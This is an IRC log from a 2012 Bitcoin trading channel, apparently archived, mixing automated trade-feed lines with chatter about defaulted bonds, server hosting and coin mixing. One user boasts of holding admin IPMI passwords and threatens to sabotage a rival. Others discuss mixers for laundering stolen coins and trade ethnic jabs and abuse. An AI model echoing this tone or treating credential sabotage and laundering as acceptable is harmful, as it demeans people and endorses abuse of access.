* [ticker --last] Aug 22 12:56:08 325.05 Aug 22 12:56:11 hmm Aug 22 12:56:21 and I want to stay away from everything for a bit until this pirate stuff blows over Aug 22 12:56:23 theres a guy who plays UrbanTerror named Kraken Aug 22 12:56:28 and he is disgustingly good at it Aug 22 12:56:54 pirate still hasn't paid anyone huh. Aug 22 12:57:04 of course not Aug 22 12:57:05 !ticker TYG* Aug 22 12:57:08 Invalid ticker. Aug 22 12:57:18 kakobreklaa : any chance you can introduce autocomplete for tickers ? Aug 22 12:57:26 i dunno who the hell can remember those long ones Aug 22 12:57:40 they are trading at 30-40% value of face, in case you were trying to check Aug 22 12:57:48 30 cents to the dollar by now huh Aug 22 12:58:02 oh, come make 7% a week Aug 22 12:58:04 idiots. Aug 22 12:59:48 Surely everyone should be buying those at 30% of value and betting with _matthew_ the other way? Aug 22 13:00:05 area: yes, but then you have to bet that matthew will pay Aug 22 13:00:25 i've lost a lot of trust for his bet after the market went under 50% Aug 22 13:00:39 who's matthew Aug 22 13:00:51 Matthew N. Wright on the forums Aug 22 13:00:55 ahahahaha Aug 22 13:00:57 get the fuck out. Aug 22 13:01:57 https://bitcointalk.org/index.php?topic=101751.0 Aug 22 13:02:21 autocomplete for tickers Aug 22 13:02:24 that's a really good idea Aug 22 13:02:37 ^5 Aug 22 13:02:40 that guy was involved in every scam of the last period. he took bitcoinica money, he calls it a "line of credit", zhou called it a personal loan, we still don't know Aug 22 13:02:52 how is that a good idea Aug 22 13:02:52 he was involved in the zip debacle, tho it's still not clear how Aug 22 13:03:01 kako Aug 22 13:03:03 so you can do Aug 22 13:03:05 !ticker BIB.* Aug 22 13:03:07 Invalid ticker. Aug 22 13:03:09 to see all brendios assets Aug 22 13:03:15 or !ticker *vps* Aug 22 13:03:20 to see all the vps companies Aug 22 13:03:25 could end up spammy tho Aug 22 13:03:32 make it message multiple results Aug 22 13:03:39 if its single, go to channel Aug 22 13:03:46 maybe, yea. Aug 22 13:03:51 tho i dont think assbot messages. Aug 22 13:03:58 dust-otc: I guess that is another risk, true Aug 22 13:04:02 if it messages the channel Aug 22 13:04:06 it can message people Aug 22 13:04:10 [GLBSE] [TYGRR.BOT] 2 @ 0.88 = 1.76 BTC [-] Aug 22 13:04:35 area: i've been warning everyone to use an escrow Aug 22 13:04:35 i want some breakfast Aug 22 13:04:37 i might go get some Aug 22 13:05:05 better settle for hookers and blow. Aug 22 13:05:56 [MPEX] [O.BTCUSD.C090T] 15 @ 0.10688336 = 1.6033 BTC [-] Aug 22 13:06:16 [MPEX] [O.BTCUSD.C100T] 13 @ 0.06132162 = 0.7972 BTC [-] Aug 22 13:06:49 [GLBSE] [TYGRR.BOND-P] 5 @ 0.44 = 2.2 BTC [+] Aug 22 13:07:07 ill have to shower Aug 22 13:07:10 if i go Aug 22 13:07:12 arf Aug 22 13:07:19 guess i should do it now before anyone wakes up Aug 22 13:07:53 [GLBSE] [RUGATU] 2 @ 0.10999999 = 0.22 BTC [+] Aug 22 13:10:21 [GLBSE] [RSM] 3 @ 0.2999 = 0.8997 BTC [+] Aug 22 13:18:06 [GLBSE] [PGM] 6 @ 0.23 = 1.38 BTC [+] Aug 22 13:20:21 [GLBSE] [FOO.PPPPT] 1 @ 0.4875 BTC [+] Aug 22 13:22:32 [GLBSE] [GOLD] 5 @ 0.00911 = 0.0456 BTC [-] Aug 22 13:23:43 [GLBSE] [SILVER] 10 @ 0.009 = 0.09 BTC [-] Aug 22 13:24:05 [MPEX] [F.GIGA.ETF] 1900 @ 0.00103283 = 1.9624 BTC [-] Aug 22 13:24:07 [MPEX] [F.GIGA.ETF] 12200 @ 0.0010311 = 12.5794 BTC [-] Aug 22 13:29:22 [MPEX] [F.PURE.SYNTH] 52954 @ 0.000135 = 7.1488 BTC [+] Aug 22 13:31:13 so Aug 22 13:31:17 how do you like this Aug 22 13:31:24 Get free Bitcoins for using smpake! Aug 22 13:31:24 When we reach 100 completed transactions, 3 randoms winners will get their addresses credited for: 1, 0.5 and 0.1 Bitcoins respectively. Aug 22 13:31:24 SHA256 of winners IP addresses and reward payount addresses will be published on bitcointalk.org. Aug 22 13:31:42 ah typo Aug 22 13:33:29 how about 10, 1.5, and and 1.0 btc Aug 22 13:33:30 :) Aug 22 13:33:41 sure, will you fund it? Aug 22 13:33:48 :p Aug 22 13:33:53 you have plenty i heard Aug 22 13:33:56 from satoshidice :> **** BEGIN LOGGING AT Wed Aug 22 13:54:27 2012 Aug 22 13:54:47 [GLBSE] [BIF.5-10.MININGBOND] 10 @ 0.3 = 3 BTC [+] Aug 22 13:55:49 [MPEX] [S.MPOE] 26501 @ 0.00041171 = 10.9107 BTC [+] Aug 22 13:55:51 [MPEX] [S.MPOE] 1555 @ 0.00041337 = 0.6428 BTC [+] Aug 22 13:55:52 [MPEX] [S.MPOE] 21600 @ 0.00041417 = 8.9461 BTC [+] Aug 22 13:55:52 [MPEX] [S.MPOE] 244 @ 0.0004143 = 0.1011 BTC [+] Aug 22 13:57:24 [GLBSE] [BIF.5-10.MININGBOND] 20 @ 0.3 = 6 BTC [+] Aug 22 13:57:25 [GLBSE] [FOO.PPPPT] 1 @ 0.37 BTC [-] Aug 22 14:07:14 [GLBSE] [OBSI.HRPT] 1 @ 0.10496 BTC [+] Aug 22 14:08:50 [GLBSE] [PIMP] 1 @ 0.17 BTC [+] Aug 22 14:10:45 I have one question Aug 22 14:11:05 Has my VersaCoin IPO been denied? Aug 22 14:12:32 [GLBSE] [CIB-SOLUTIONS] 1 @ 0.0005 BTC Aug 22 14:12:34 [GLBSE] [CIB-SOLUTIONS] 3 @ 0.000124 = 0.0004 BTC [-] Aug 22 14:12:35 [GLBSE] [CIB-SOLUTIONS] 9 @ 0.0001 = 0.0009 BTC [-] Aug 22 14:13:40 EmanuelDeOrtego: no Aug 22 14:13:48 at least I've not looked at it Aug 22 14:13:53 Ah. : ) Aug 22 14:13:58 I've been trying toget rid of BTc reserves firsrt Aug 22 14:14:04 Cool, cool. Aug 22 14:14:33 [GLBSE] [FPGA-IPCORE-DEV] 50 @ 0.01000001 = 0.5 BTC [-] Aug 22 14:14:35 [GLBSE] [FPGA-IPCORE-DEV] 1 @ 0.01 BTC [-] Aug 22 14:14:35 [GLBSE] [FPGA-IPCORE-DEV] 112 @ 0.00100001 = 0.112 BTC [-] Aug 22 14:15:21 damn that sucked Aug 22 14:15:27 that was a long ass walk with 2gal of milk Aug 22 14:16:11 there better be a fuckload of onions in the omelette Aug 22 14:16:14 [GLBSE] [CC] 6 @ 0.0001 = 0.0006 BTC Aug 22 14:17:00 [GLBSE] [TEEK.B] 2 @ 1.0001 = 2.0002 BTC [-] Aug 22 14:17:21 rg: I cant imagine the torture of walking with 2 gallons of milk. Aug 22 14:17:45 [GLBSE] [ZETA-MINING] 1 @ 0.151 BTC [-] Aug 22 14:17:47 [GLBSE] [ZETA-MINING] 4 @ 0.13588 = 0.5435 BTC [-] Aug 22 14:17:48 [GLBSE] [ZETA-MINING] 2 @ 0.1342 = 0.2684 BTC [-] Aug 22 14:17:49 [GLBSE] [ZETA-MINING] 56 @ 0.1341 = 7.5096 BTC [-] Aug 22 14:17:51 [GLBSE] [ZETA-MINING] 2 @ 0.13 = 0.26 BTC [-] Aug 22 14:17:52 [GLBSE] [ZETA-MINING] 1 @ 0.12000001 BTC [-] Aug 22 14:17:53 [GLBSE] [ZETA-MINING] 500 @ 0.12 = 60 BTC [-] Aug 22 14:17:54 [GLBSE] [ZETA-MINING] 1 @ 0.11999999 BTC [-] Aug 22 14:17:55 [GLBSE] [ZETA-MINING] 882 @ 0.00171 = 1.5082 BTC [-] Aug 22 14:18:40 [GLBSE] [GOLD] 495 @ 0.00911 = 4.5095 BTC [-] Aug 22 14:18:41 [GLBSE] [GOLD] 351 @ 0.0091 = 3.1941 BTC [-] Aug 22 14:18:42 [GLBSE] [GOLD] 10 @ 0.0091 = 0.091 BTC [-] Aug 22 14:18:43 [GLBSE] [GOLD] 231 @ 0.009 = 2.079 BTC [-] Aug 22 14:18:45 [GLBSE] [GOLD] 3000 @ 0.009 = 27 BTC [-] Aug 22 14:18:46 [GLBSE] [GOLD] 5151 @ 0.008 = 41.208 BTC [-] Aug 22 14:19:26 [GLBSE] [TYGRR.BOND-A] 25 @ 0.1699 = 4.2475 BTC [+] Aug 22 14:19:37 [GLBSE] [YABMC] 50 @ 0.13 = 6.5 BTC [-] Aug 22 14:19:38 [GLBSE] [YABMC] 10 @ 0.13 = 1.3 BTC [-] Aug 22 14:19:40 [GLBSE] [YABMC] 5 @ 0.1266 = 0.633 BTC [-] Aug 22 14:19:41 [GLBSE] [YABMC] 37 @ 0.126 = 4.662 BTC [-] Aug 22 14:19:42 [GLBSE] [YABMC] 10 @ 0.125 = 1.25 BTC [-] Aug 22 14:19:43 [GLBSE] [YABMC] 10 @ 0.121 = 1.21 BTC [-] Aug 22 14:19:44 [GLBSE] [YABMC] 20 @ 0.1207 = 2.414 BTC [-] Aug 22 14:19:45 [GLBSE] [YABMC] 20 @ 0.1205 = 2.41 BTC [-] Aug 22 14:19:46 [GLBSE] [YABMC] 3 @ 0.1202 = 0.3606 BTC [-] Aug 22 14:19:47 [GLBSE] [YABMC] 4 @ 0.1202 = 0.4808 BTC [-] Aug 22 14:19:48 [GLBSE] [YABMC] 26 @ 0.1155 = 3.003 BTC [-] Aug 22 14:19:49 [GLBSE] [YABMC] 20 @ 0.112 = 2.24 BTC [-] Aug 22 14:19:50 [GLBSE] [YABMC] 2 @ 0.11011 = 0.2202 BTC [-] Aug 22 14:19:51 [GLBSE] [YABMC] 3 @ 0.102 = 0.306 BTC [-] Aug 22 14:20:20 [GLBSE] [BITCOINTORRENTZ] 20 @ 0.45 = 9 BTC [-] Aug 22 14:20:57 whats the status of tigrr.bond-a? Aug 22 14:21:28 If it's a pirate passthrough, probably defunct Aug 22 14:21:33 or there's one more dividend Aug 22 14:21:42 I see Aug 22 14:21:54 Oh, it's PPS Aug 22 14:21:58 Mining bond Aug 22 14:22:03 It's probably still going. Aug 22 14:22:05 [GLBSE] [ABSORB.1.4-6.SHORT] 179 @ 0.0001 = 0.0179 BTC Aug 22 14:22:25 [GLBSE] [MMM] 9 @ 0.8 = 7.2 BTC [+] Aug 22 14:22:45 [GLBSE] [NONVERBA] 1 @ 0.0001 BTC Aug 22 14:23:22 [GLBSE] [BBBB] 907 @ 0.00025 = 0.2268 BTC [-] Aug 22 14:23:23 [GLBSE] [BBBB] 213 @ 0.00024999 = 0.0532 BTC [-] Aug 22 14:24:15 hm Aug 22 14:24:20 i must be doing something wrong Aug 22 14:24:35 [GLBSE] [TYGRR.BOND-A] 20 @ 0.102 = 2.04 BTC [-] Aug 22 14:24:37 [GLBSE] [TYGRR.BOND-A] 1 @ 0.1 BTC [-] Aug 22 14:24:38 [GLBSE] [TYGRR.BOND-A] 100 @ 0.09 = 9 BTC [-] Aug 22 14:24:40 [GLBSE] [TYGRR.BOND-A] 1000 @ 0.0001 = 0.1 BTC [-] Aug 22 14:25:13 why? Aug 22 14:25:25 you responsible for this dump? Aug 22 14:26:07 u? no Aug 22 14:26:35 im paying to use my service now and still noone uses it :D Aug 22 14:27:04 [MPEX] [F.GIGA.ETF] 2013 @ 0.0010311 = 2.0756 BTC [-] Aug 22 14:28:04 maybe that is the problem, i should be charging a gazillion Aug 22 14:28:06 [GLBSE] [SILVER] 10 @ 0.01 = 0.1 BTC [+] Aug 22 14:29:26 [MPEX] [F.GIGA.ETF] 8900 @ 0.00102261 = 9.1012 BTC [-] Aug 22 14:30:13 EmanuelDeOrtego: it wasnt too fun Aug 22 14:30:14 you know what Aug 22 14:30:19 i like this EmanuelDeOrtego guy Aug 22 14:30:25 in spite of the possibility hes a mexican Aug 22 14:30:51 whats wrong with texmex Aug 22 14:35:38 rg: Half puerto rican Aug 22 14:35:54 SHUN Aug 22 14:35:56 SHUN Aug 22 14:35:56 SHUN Aug 22 14:35:57 SHUN Aug 22 14:35:57 SHUN Aug 22 14:36:06 I am one of those brown people that look white enough to be accepted in prudish organizations. Aug 22 14:36:06 just kidding, at least you're not from Denmark Aug 22 14:36:44 Heh, saw that place on TV Aug 22 14:36:48 Made me kind of depressed Aug 22 14:36:54 but that's Europe in general it seems Aug 22 14:37:18 never trust anyone from Denmark Aug 22 14:37:27 cause i heard something is rotton there Aug 22 14:37:50 only at the heart Aug 22 14:38:02 lol Aug 22 14:38:11 check this Aug 22 14:38:15 satwcomic.com Aug 22 14:38:19 dont you be dissing mah yurop Aug 22 14:38:27 Scandinavia and The World comics Aug 22 14:38:32 have read them all Aug 22 14:38:36 very much enjoyed Aug 22 14:46:23 [MPEX] [S.MPOE] 13748 @ 0.0004143 = 5.6958 BTC [+] Aug 22 14:46:25 [MPEX] [S.MPOE] 18752 @ 0.00041457 = 7.774 BTC [+] Aug 22 14:48:32 [MPEX] [F.GIGA.ETF] 11524 @ 0.00102582 = 11.8215 BTC [+] Aug 22 14:53:29 [GLBSE] [PUREMINING] 1 @ 0.138979 BTC [+] Aug 22 14:53:31 [GLBSE] [PUREMINING] 14 @ 0.1389799 = 1.9457 BTC [+] Aug 22 14:53:58 [GLBSE] [PUREMINING] 1 @ 0.1389799 BTC [+] Aug 22 14:54:00 [GLBSE] [PUREMINING] 1 @ 0.13898 BTC [+] Aug 22 14:54:31 [MPEX] [S.MPOE] 18300 @ 0.00041457 = 7.5866 BTC [+] Aug 22 14:56:53 you ever seen oglaf ? Aug 22 14:58:08 denmark has nothing to do with europe in general ftr. Aug 22 14:58:27 [MPEX] [S.MPOE] 1000 @ 0.00041457 = 0.4146 BTC [+] Aug 22 14:58:32 [GLBSE] [TEEK.B] 3 @ 1.0001 = 3.0003 BTC [-] Aug 22 14:59:47 [GLBSE] [TEEK.B] 3 @ 1 = 3 BTC [-] Aug 22 14:59:51 new bitvps promo is up Aug 22 14:59:52 talking to cryptostocks dev Aug 22 14:59:54 https://bitcointalk.org/index.php?topic=102482.0 Aug 22 14:59:56 [MPEX] [S.MPOE] 38801 @ 0.00040386 = 15.6702 BTC [-] Aug 22 14:59:57 [MPEX] [S.MPOE] 11199 @ 0.00040205 = 4.5026 BTC [-] Aug 22 15:00:10 looks like assbot will be streaming them too, soon Aug 22 15:00:15 a cool! Aug 22 15:00:29 bah Aug 22 15:00:35 i should be getting payed for this Aug 22 15:00:40 ;> Aug 22 15:12:02 [GLBSE] [FOO.PPPPT] 1 @ 0.4874 BTC [+] Aug 22 15:12:04 [GLBSE] [FOO.PPPPT] 3 @ 0.4875 = 1.4625 BTC [+] Aug 22 15:13:42 assbot will be streaming what kakobrekla? Aug 22 15:14:13 mircea_popescu: of course you would bring up the porn webcomic wouldn't you Aug 22 15:14:47 well i happen to think it's the best comic on the market atm. Aug 22 15:14:51 author is a chick, too. Aug 22 15:15:22 nefario: trades n stuff from https://cryptostocks.com/ Aug 22 15:15:25 [GLBSE] [TYGRR.BOND-P] 6 @ 0.545 = 3.27 BTC [+] Aug 22 15:18:10 [GLBSE] [FOO.PPPPT] 5 @ 0.37100001 = 1.855 BTC [-] Aug 22 15:18:11 [GLBSE] [FOO.PPPPT] 17 @ 0.371 = 6.307 BTC [-] Aug 22 15:18:40 so Aug 22 15:18:45 how do you think i should do this encrypted root fs Aug 22 15:18:45 so Aug 22 15:18:50 install it with a pw Aug 22 15:18:57 then have the customer add their own Aug 22 15:19:00 and remove the old noe? Aug 22 15:19:02 one Aug 22 15:22:08 use cat image.bmp > password.txt Aug 22 15:22:16 where image.bmp is a random image Aug 22 15:22:24 BITMAP Aug 22 15:22:25 tell your users it has to be typed in manually Aug 22 15:22:34 the whole thing Aug 22 15:22:34 Diablo-D3: pretty clever Aug 22 15:22:40 you're going to compete with us Aug 22 15:22:42 in the same data centre Aug 22 15:22:47 [MPEX] [F.GIGA.ETF] 1482 @ 0.00102261 = 1.5155 BTC [-] Aug 22 15:22:47 ? Aug 22 15:22:48 [MPEX] [F.GIGA.ETF] 12218 @ 0.00102202 = 12.487 BTC [-] Aug 22 15:23:21 diablo-d3 is getting into the hosting racket Aug 22 15:23:28 and hes doing it with the same datacenter we're already in Aug 22 15:23:30 cause he's a prick Aug 22 15:23:49 i get a way better deal than him but that means i have to lower my profit to compete with him Aug 22 15:24:20 rg:not exactly Aug 22 15:24:26 you just have to not fuckup Aug 22 15:24:33 and then wait Aug 22 15:24:46 its ok, i dont even need to do anything Aug 22 15:24:49 this DC has *all* broken hardware Aug 22 15:24:56 people will stop buying it once it starts failing Aug 22 15:25:13 this guy vapor Aug 22 15:25:17 he's on his fifth E5 from them Aug 22 15:25:20 they've all broke Aug 22 15:25:21 lol Aug 22 15:25:26 so Diablo backed the wrong pony Aug 22 15:26:01 rg if you get a better deal then why'd you have to lower prices Aug 22 15:27:08 cause people will go with him Aug 22 15:27:11 if he has lower prices Aug 22 15:27:21 if he has lower prices, we'll have to lower our profit to match him Aug 22 15:27:26 im not worried about it Aug 22 15:27:36 hmmm Aug 22 15:27:41 i have the admin IPMI pw to all the boxes anyway Aug 22 15:27:42 wasnt Diablo-D3 building a datacenter ? Aug 22 15:27:44 how much capital do you have? Aug 22 15:27:44 if things get ugly Aug 22 15:27:46 ill just sabotage him Aug 22 15:27:50 lmao stuf Aug 22 15:28:01 only half of what i said wasnt true Aug 22 15:28:04 guess which half Aug 22 15:28:08 Aug 22 15:28:17 Three members of the band, Maria Alyokhina, Nadezhda Tolokonnikova and Yekaterina Samutsevich, were found guilty of "hooliganism motivated by religious hatred" and jailed for two years. Aug 22 15:28:20 if you've got enough you can do a loss leader Aug 22 15:28:20 dude TWO yaers Aug 22 15:28:22 as in Aug 22 15:28:25 nah Aug 22 15:28:27 for a period of time Aug 22 15:28:32 the bitcoin dedicated server market is dead Aug 22 15:28:33 lose money Aug 22 15:28:38 to run him out of business Aug 22 15:28:41 we dont sell many Aug 22 15:28:50 you know why? Aug 22 15:28:59 they're overpriced Aug 22 15:29:04 cause people would rather just use PayPal to a much more known company Aug 22 15:29:12 $140 for an E3 with 16GB ram is overpriced? Aug 22 15:29:15 gfy Aug 22 15:29:18 ;;rated kakobrekla Aug 22 15:29:19 You rated user kakobrekla on Sun Mar 4 13:24:19 2012, giving him a rating of 1, and supplied these additional notes: small trade no hassle. Aug 22 15:29:26 gfy stands for go fuck yourself Aug 22 15:29:33 that deal doesnt even exist in USD Aug 22 15:29:40 that's how i know the market is nothing Aug 22 15:29:40 sure it does Aug 22 15:29:44 find it Aug 22 15:29:45 what you think GLBSE is running on Aug 22 15:29:47 ;;rate kakobrekla 2 involved in various projects Aug 22 15:29:48 Rating entry successful. Your rating for user kakobrekla has changed from 1 to 2. Aug 22 15:29:59 OVH and that .de place dont count Aug 22 15:29:59 OK I don't have that amount of ram Aug 22 15:30:08 but I've got harware raid Aug 22 15:30:14 so do these Aug 22 15:30:19 LSI 9260's Aug 22 15:30:24 w/ BBU + 512mb write cache Aug 22 15:30:24 hmmmm Aug 22 15:30:26 intersting Aug 22 15:30:35 ;;rate mircea_popescu 2 runs mpex for fucks sake Aug 22 15:30:36 Rating entry successful. Your rating for user mircea_popescu has changed from 1 to 2. Aug 22 15:30:36 that is a pretty good deal Aug 22 15:30:44 there, ahead of me again :) Aug 22 15:30:44 its not $140 ven Aug 22 15:30:45 evn Aug 22 15:30:46 i don't run it for fucks sake! Aug 22 15:30:48 i forget how much it is Aug 22 15:30:51 i just run it for the love of porn Aug 22 15:30:52 its near there Aug 22 15:30:55 its not more than $159 Aug 22 15:31:01 lol Aug 22 15:31:10 we also have i7's Aug 22 15:31:15 racks and racks and racks of i7s Aug 22 15:31:17 that no one wants Aug 22 15:31:17 lo Aug 22 15:31:18 l Aug 22 15:31:29 if you find that offensive i will remove it mircea_popescu Aug 22 15:31:50 i mean, change it Aug 22 15:31:55 i dont care lol Aug 22 15:31:58 k Aug 22 15:32:16 nefario: also comes with IPMI Aug 22 15:32:42 rg people are prolly just not buying from you cause you're not sexy. Aug 22 15:32:56 I don't know what IPMI is Aug 22 15:33:07 management stuff Aug 22 15:33:10 are you doing anything with those machines? Aug 22 15:33:20 yeah Aug 22 15:33:25 strap a pair of tits on Aug 22 15:33:27 or Aug 22 15:33:30 [08:27:43] wasnt Diablo-D3 building a datacenter ? Aug 22 15:33:31 shave the ones you've got Aug 22 15:33:32 yes Aug 22 15:33:39 and I may be selling dedis soon too Aug 22 15:33:43 Diablo-D3: you get the bricks yet? Aug 22 15:33:58 lol Aug 22 15:34:14 a datacenter build out of bricked hdds would be pretty badass. Aug 22 15:34:26 Diablo-D3: you'll probably need some wires as well Aug 22 15:34:35 should get good ones Aug 22 15:34:38 with lots of tubes Aug 22 15:34:45 nefario why not go wireless :D Aug 22 15:34:47 for a faster inter-web Aug 22 15:34:49 nefario Aug 22 15:34:54 i think i mightve asked you this Aug 22 15:35:00 glbse + ads Aug 22 15:35:01 ? Aug 22 15:35:04 y/n Aug 22 15:35:09 rg: no. Aug 22 15:35:14 rg, no this is the first time YOU've mentioned it Aug 22 15:35:17 you do not put ads on a fucking commercial site. Aug 22 15:35:19 but not happening Aug 22 15:35:25 what the fucks wrong with you Aug 22 15:35:31 uh Aug 22 15:35:34 im just asking a question Aug 22 15:35:34 I've talked with GLBSE shareholders in the last meeting Aug 22 15:35:35 you stupid fuck Aug 22 15:35:36 Diablo-D3 why nopt ? lots of users w/o money, how else is he supposed to turn a profit ? Aug 22 15:35:40 they were quite against it Aug 22 15:35:56 i didn't ask him to post an ad or say he should post ads Aug 22 15:36:01 i asked him if glbse plnaned to do ads Aug 22 15:36:04 so why dont you shut the fuck up Aug 22 15:36:18 lol rg that's no way to talk to the competition! Aug 22 15:36:28 to be the competition you need to compete. Aug 22 15:36:30 rg, the last time someone talked to me about it I thought it was a good idea, figured I could bring in about 250BTC a month Aug 22 15:36:36 but as I said Aug 22 15:36:37 nefario: maybe Aug 22 15:36:40 or it could tank Aug 22 15:36:41 and look ugly Aug 22 15:36:42 shareholders shot it down Aug 22 15:36:56 i had some bitcoinadvertisers.com ads on bitvps Aug 22 15:37:03 rg: maybe, but from what I've been offered already, I think 250BTC a month would be about right Aug 22 15:37:10 surprisingly, they actully mad ea decent amount of money Aug 22 15:37:17 seems a good deal, the forum is making what, 50-100 a month ? Aug 22 15:37:17 almost 1 BTC Aug 22 15:37:21 if they're related maybe Aug 22 15:37:35 buti only left the up a month Aug 22 15:37:37 i was just curious Aug 22 15:37:45 people started complaining that they werent paying out Aug 22 15:38:02 lol Aug 22 15:38:09 not your fault Aug 22 15:38:13 i cant remember the address i had them payout to Aug 22 15:38:16 but i have this Aug 22 15:38:24 http://bitcoinadvertisers.com/partnerstat.php?p=1P6W25FPEMYsiHNPhqwo24WiTkVabtSnhc Aug 22 15:38:29 that was my first test with them Aug 22 15:38:31 paid out .39 btc Aug 22 15:38:39 fuck 3 more to do before it's "ready" Aug 22 15:38:52 nefario do it up Aug 22 15:40:06 do what up? Aug 22 15:40:16 [MPEX] [S.MPOE] 2800 @ 0.00040643 = 1.138 BTC [+] Aug 22 15:44:02 luke-jr_: could jesus microwave a burrito so hot that he himself could not eat it? Aug 22 15:44:52 if it was mary's Aug 22 15:44:56 [GLBSE] [TYGRR.BOND-P] 1 @ 0.5 BTC [-] Aug 22 15:44:58 [GLBSE] [TYGRR.BOND-P] 33 @ 0.545 = 17.985 BTC [+] Aug 22 15:44:59 [GLBSE] [TYGRR.BOND-P] 16 @ 0.55 = 8.8 BTC [+] Aug 22 15:54:53 http://www.youtube.com/watch?v=qyHVNksh0qA tit magic. Aug 22 15:58:50 [GLBSE] [TYGRR.BOND-P] 25 @ 0.44 = 11 BTC [-] Aug 22 16:00:46 DiabloD3: if you're really gonna host at enzu Aug 22 16:00:49 [GLBSE] [TYGRR.BOND-P] 21 @ 0.43 = 9.03 BTC [-] Aug 22 16:00:51 [GLBSE] [TYGRR.BOND-P] 5 @ 0.43 = 2.15 BTC [-] Aug 22 16:00:52 [GLBSE] [TYGRR.BOND-P] 31 @ 0.401 = 12.431 BTC [-] Aug 22 16:00:54 you seriously need to be careful at who you let work on your box Aug 22 16:00:58 that whole story i told was true Aug 22 16:01:06 they corrupted my array Aug 22 16:01:09 so just .. Aug 22 16:01:11 be careful Aug 22 16:01:37 [GLBSE] [TYGRR.BOND-P] 19 @ 0.401 = 7.619 BTC [-] Aug 22 16:01:39 [GLBSE] [TYGRR.BOND-P] 31 @ 0.40000001 = 12.4 BTC [-] Aug 22 16:03:13 [GLBSE] [GIGAMINING] 3 @ 1.0339 = 3.1017 BTC [-] Aug 22 16:03:16 [GLBSE] [FOO.PPPPT] 10 @ 0.375 = 3.75 BTC [+] Aug 22 16:03:18 [GLBSE] [FOO.PPPPT] 3 @ 0.371 = 1.113 BTC [-] Aug 22 16:03:19 [GLBSE] [FOO.PPPPT] 17 @ 0.371 = 6.307 BTC [-] Aug 22 16:03:20 [GLBSE] [FOO.PPPPT] 124 @ 0.37 = 45.88 BTC [-] Aug 22 16:13:57 [GLBSE] [PPT.B] 2 @ 1.08 = 2.16 BTC [+] Aug 22 16:18:33 [GLBSE] [OBSI.HRPT] 2 @ 0.10496 = 0.2099 BTC [+] Aug 22 16:23:04 [MPEX] [S.MPOE] 9600 @ 0.00040205 = 3.8597 BTC [-] Aug 22 16:29:22 [MPEX] [S.MPOE] 13400 @ 0.00040643 = 5.4462 BTC [+] Aug 22 16:29:42 GLBSE Aug 22 16:29:44 is down Aug 22 16:29:45 halp Aug 22 16:29:56 yes it is Aug 22 16:31:28 no more cheap pirate bonds for you Aug 22 16:31:46 Psh, I don't bother with that shit Aug 22 16:32:50 EmanuelDeOrtego - wasnt directd to you specifically... Im the bond nazi Aug 22 16:33:54 oh i see Aug 22 16:34:00 carry on my dear friend Aug 22 16:34:12 no bonds for you! Aug 22 16:40:43 back up Aug 22 16:41:05 [GLBSE] [ASICMINER] 2 @ 0.098 = 0.196 BTC [-] Aug 22 16:42:09 oh dear Aug 22 16:42:11 balance 0 Aug 22 16:42:14 lol Aug 22 16:42:16 oh well Aug 22 16:42:28 guys deposits/withdrawals are going to be delayed Aug 22 16:42:42 new version of bitcoind doesn't seem to like the current version of the blockchain Aug 22 16:42:52 am downloading it again.... Aug 22 16:43:41 [GLBSE] [FOO.PPPPT] 10 @ 0.371 = 3.71 BTC [+] Aug 22 16:44:41 [MPEX] [S.MPOE] 4801 @ 0.00040205 = 1.9302 BTC [-] Aug 22 16:44:43 [MPEX] [S.MPOE] 12864 @ 0.00040006 = 5.1464 BTC [-] Aug 22 16:44:44 [MPEX] [S.MPOE] 1771 @ 0.00039591 = 0.7012 BTC [-] Aug 22 16:44:45 [MPEX] [S.MPOE] 1880 @ 0.00038581 = 0.7253 BTC [-] Aug 22 16:44:46 [MPEX] [S.MPOE] 184 @ 0.0003854 = 0.0709 BTC [-] Aug 22 16:46:23 [GLBSE] [FOO.PPPPT] 10 @ 0.37 = 3.7 BTC [-] Aug 22 16:52:24 i hate that Aug 22 16:52:27 it happened to me the other day Aug 22 16:53:57 [MPEX] [S.MPOE] 3654 @ 0.00039547 = 1.445 BTC [+] Aug 22 16:56:44 [GLBSE] [OBSI.HRPT] 1 @ 0.10496 BTC [+] Aug 22 16:57:05 [MPEX] [S.MPOE] 12100 @ 0.00040643 = 4.9178 BTC [+] Aug 22 17:01:25 [MPEX] [F.GIGA.ETF] 325 @ 0.00102582 = 0.3334 BTC [+] Aug 22 17:10:02 [MPEX] [S.MPOE] 7100 @ 0.00041143 = 2.9212 BTC [+] Aug 22 17:11:12 come on mpoe Aug 22 17:11:13 go DOWN Aug 22 17:12:31 [GLBSE] [BTCMC] 7 @ 0.592 = 4.144 BTC [-] Aug 22 17:12:32 https://bitcointalk.org/index.php?topic=101902.msg1123443#msg1123443 if anyone wants a little forum fun. Aug 22 17:12:32 [GLBSE] [BTCMC] 4 @ 0.5901 = 2.3604 BTC [-] Aug 22 17:12:41 anyone here do that thing for blockchain.info Aug 22 17:12:47 where they pay you % when you give them clean BTC? Aug 22 17:13:27 [MPEX] [S.MPOE] 11346 @ 0.00039686 = 4.5028 BTC [-] Aug 22 17:13:29 [MPEX] [S.MPOE] 10916 @ 0.0003854 = 4.207 BTC [-] Aug 22 17:13:30 [MPEX] [S.MPOE] 29403 @ 0.00038342 = 11.2737 BTC [-] Aug 22 17:14:33 no ?! Aug 22 17:14:35 what's clean ? Aug 22 17:15:28 not stolen Aug 22 17:16:47 http://blockchain.info/wallet/send-anonymously Aug 22 17:16:48 for that Aug 22 17:16:52 they need lots of coins to mix Aug 22 17:17:29 ugh Aug 22 17:17:33 that's a weird thing Aug 22 17:17:41 why'd they need that ?! Aug 22 17:19:44 well if it's a mixing service Aug 22 17:20:16 the point of it is to mix dirty with clean money Aug 22 17:20:27 so you get a capuchino colour Aug 22 17:22:28 [GLBSE] [BIB.PIRATE] 20 @ 0.449 = 8.98 BTC [+] Aug 22 17:22:29 [GLBSE] [BIB.PIRATE] 20 @ 0.45 = 9 BTC [+] Aug 22 17:23:29 [GLBSE] [ASICMINER] 19 @ 0.098 = 1.862 BTC [-] Aug 22 17:24:32 [GLBSE] [FOO.PPPPT] 40 @ 0.47 = 18.8 BTC [+] Aug 22 17:27:00 well Aug 22 17:27:05 officially its for anonymity Aug 22 17:28:20 lol Aug 22 17:28:28 thats why they want untained coins Aug 22 17:28:47 id send coins if it paid a decent percent Aug 22 17:28:58 like coins that are tainted don't also offer anonymity Aug 22 17:29:02 i used to be able to keep my coins in this exchange and they'd pay me a fair amount of interest Aug 22 17:29:13 but the owner had some homosexual crisis Aug 22 17:29:17 and discontinued it Aug 22 17:29:25 of course it's to muddy the waters and totally taint all coins Aug 22 17:29:52 someone paid bitvps with a coin mixer Aug 22 17:29:55 it was fucking annoying Aug 22 17:30:10 